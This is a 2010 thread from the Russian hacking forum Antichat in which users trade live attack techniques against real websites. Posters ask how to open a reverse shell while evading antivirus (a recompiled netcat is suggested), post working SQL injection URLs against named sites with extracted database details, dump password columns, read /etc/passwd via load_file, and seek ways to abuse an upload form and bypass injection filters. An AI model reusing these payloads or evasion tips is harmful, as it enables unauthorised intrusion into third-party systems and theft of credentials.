Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

05.04.2010, 19:02
|
|
Познающий
Регистрация: 17.09.2008
Сообщений: 56
Провел на форуме: 587324
Репутация:
40
|
|
Через что можно сделать back connect кроме netcat. Net cat не подходит, т.к. палится антивирусом.
Читал что можно через netwox но так и не разобрался как. Знающие подскажите!
|
|
|

05.04.2010, 19:33
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме: 1343031
Репутация:
184
|
|
Есть альтернативная версия netcat (просто заново скомпилированная - она не детектится). Еще есть mocat. Поищи в гугле.
|
|
|

05.04.2010, 19:50
|
|
Banned
Регистрация: 14.06.2008
Сообщений: 34
Провел на форуме: 119183
Репутация:
13
|
|
Помогите please докрутить скуль
http://www.nnovia.com/products.php?id=31%20and%201=2
|
|
|

05.04.2010, 20:56
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
Код:
http://www.nnovia.com/products.php?id=-31+or+1=1+and+substring(version(),1,1)=5
Blind MYsql system information:
----------------------------------
@@basedir: /
@@tmpdir: /tmp/
database(): nnovia3_osc1
@@version_compile_os: pc-linux-gnu
version(): 5.0.89-community
@@datadir: /var/lib/mysql/
user(): nnovia3_osc1@localhost
|
|
|

05.04.2010, 21:24
|
|
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме: 247684
Репутация:
136
|
|
Сообщение от Pashkela
Код:
http://www.nnovia.com/products.php?id=-31+or+1=1+and+substring(version(),1,1)=5
Blind MYsql system information:
----------------------------------
@@basedir: /
@@tmpdir: /tmp/
database(): nnovia3_osc1
@@version_compile_os: pc-linux-gnu
version(): 5.0.89-community
@@datadir: /var/lib/mysql/
user(): nnovia3_osc1@localhost
а таблицы с юзверями там всеравно нет.....
|
|
|

05.04.2010, 21:26
|
|
Banned
Регистрация: 14.06.2008
Сообщений: 34
Провел на форуме: 119183
Репутация:
13
|
|
2 Pashkela thanks.
Я ввожу твою строку
http://www.nnovia.com/products.php?id=-31+or+1=1+and+substring(version(),1,1)=5
и на экране ничего не выводится. или эта конструкция работает только с тулзой?
Последний раз редактировалось Darren; 06.04.2010 в 00:00..
|
|
|

05.04.2010, 21:30
|
|
Banned
Регистрация: 05.04.2010
Сообщений: 1
Провел на форуме: 17233
Репутация:
0
|
|
Сообщение от Darren
Pashkela thanks.
а от чего зависит
+and+substring(version(),1,1)=3
+and+substring(version(),1,1)=4
или?
+and+substring(version(),1,1)=5
От того, какая версия мускула стоит.
|
|
|

05.04.2010, 22:10
|
|
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме: 247684
Репутация:
136
|
|
может кто поможет и подскажет как раскрутить....
получен доступ к password а к login нет
http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid= 196&uid=-167+and+1=2+union+all+select+aes_decrypt(aes_encry pt(group_concat(pwd,0x3a+SEPARATOR+0x0b),0x71),0x7 1),2,3,4,5+from+users--
решил использовать load_file('/etc/passwd')
http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid= 196&uid=-167+and+1=2+union+all+select+load_file(0x2f6574632 f706173737764),2,3,4,5+from+users--
получил права на чтение файлов
/home/
http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid= 196&uid=-167+and+1=2+union+all+select+load_file(0x2f686f6d6 52f),2,3,4,5+from+users--
а вот в дальнейших деррикториях я запутался
|
|
|

05.04.2010, 23:56
|
|
Новичок
Регистрация: 09.03.2010
Сообщений: 17
Провел на форуме: 34021
Репутация:
0
|
|
Сообщение от ZeroCold
Да кавычки фунициклируют, ну да столбец принтабельный таким методом выудил пас и лог от админки, правда по очереди, т.е. в два запроса каждый раз обрашаясь только к первому столбцу за один запрос неполучалось, скуль 4.18, покрайней мере так н мап сказал, другим способом не узнавалось.
Что касается загрузчика то даже не представляю как он выглядит, в смысле его код, на всей странице есть только ява
Код:
<!-- 3function MM_jumpMenu(targ,selObj,restore){ //v3.0 4 eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'"); 5 if (restore) selObj.selectedIndex=0; 6} 7//-->
но что то мне подсказывает отношения к загрузке это не имеет. 
Что касается самой конопки загрузки то фаер баг очень скупо о ней отзываеться
Код:
<input type="file" name="img_mini">
- об окне ввода пути откуда загружать
Код:
<input type="submit" value="Вставить файлы" id="files" name="files">
- собственно кнопка заливки. Есть идеи как это можно проэксплуатировать? )
Вопрос все еще актуален, нужны свежие идеи ))
|
|
|

06.04.2010, 00:29
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
в скуле фильтруются () как обойти? хексил, 0х28 0х29 не помогает.какие предложения?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|